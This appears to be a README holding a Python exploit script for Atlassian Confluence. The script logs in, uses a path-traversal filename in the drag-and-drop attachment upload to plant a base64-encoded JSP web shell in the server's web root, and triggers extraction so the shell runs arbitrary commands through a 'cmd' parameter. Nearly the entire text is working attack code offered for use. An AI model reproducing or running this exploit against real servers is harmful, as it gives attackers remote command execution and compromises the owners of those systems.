README.md
Rendering markdown...
#!/usr/bin/python3.6
import requests
from bs4 import BeautifulSoup
import base64
url = 'http://127.0.0.1:8090/'
values = {'os_username':'admin',
'os_password':'password',
'login':'Log+in',
'os_destination':''}
headers = {
'accept': '*/*',
'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'
}
jspshell = 'PCVAIHBhZ2UKaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiJT4KPCUKJT4KPEhUTUw+CjxCT0RZPgo8SDM+SlNQIFNIRUxMPC9IMz4KPEZPUk0gTUVUSE9EPSJHRVQiIE5BTUU9Im15Zm9ybSIKQUNUSU9OPSIiPgo8SU5QVVQgVFlQRT0idGV4dCIgTkFNRT0iY21kIj4KPElOUFVUIFRZUEU9InN1Ym1pdCIgVkFMVUU9IkV4ZWN1dGUiPgo8L0ZPUk0+CjxQUkU+CjwlCmlmIChyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikgIT0gbnVsbCkgewpvdXQucHJpbnRsbigiQ29tbWFuZDogIiArCnJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSArICI8QlI+Iik7ClByb2Nlc3MgcCA9ClJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKT3V0cHV0U3RyZWFtIG9zID0gcC5nZXRPdXRwdXRTdHJlYW0oKTsKSW5wdXRTdHJlYW0gaW4gPSBwLmdldElucHV0U3RyZWFtKCk7CkRhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKU3RyaW5nIGRpc3IgPSBkaXMucmVhZExpbmUoKTsKd2hpbGUgKCBkaXNyICE9IG51bGwgKSB7Cm91dC5wcmludGxuKGRpc3IpOwpkaXNyID0gZGlzLnJlYWRMaW5lKCk7Cn0KfQolPgo8L1BSRT4KPC9CT0RZPgo8L0hUTUw+Cg=='
session = requests.Session()
login = session.post(url + 'dologin.action', headers=headers, data=values)
soup = BeautifulSoup(login.text, 'html.parser')
csrf_token = soup.select_one('meta[name="atlassian-token"]').get('content',None)
createpage = session.get(url + 'pages/createpage.action')
soup = BeautifulSoup(createpage.text, 'html.parser')
draft_id = soup.select_one('meta[name="ajs-draft-id"]').get('content',None)
attach = session.post(url + 'plugins/drag-and-drop/upload.action?draftId=' + draft_id + '&filename=../../../../../../opt/atlassian/confluence/confluence/shell.jsp&size=637&mimeType=text%2fplain&atl_token=' + csrf_token, headers=headers,data=base64.b64decode(jspshell))
downloadallattachments = session.get(url + 'pages/downloadallattachments.action?pageId=' + draft_id, headers=headers)
if downloadallattachments.status_code == 200:
print('Success! Go to ' + url + 'shell.jsp for your shell!')
else:
print('Something went wrong. Blame python.')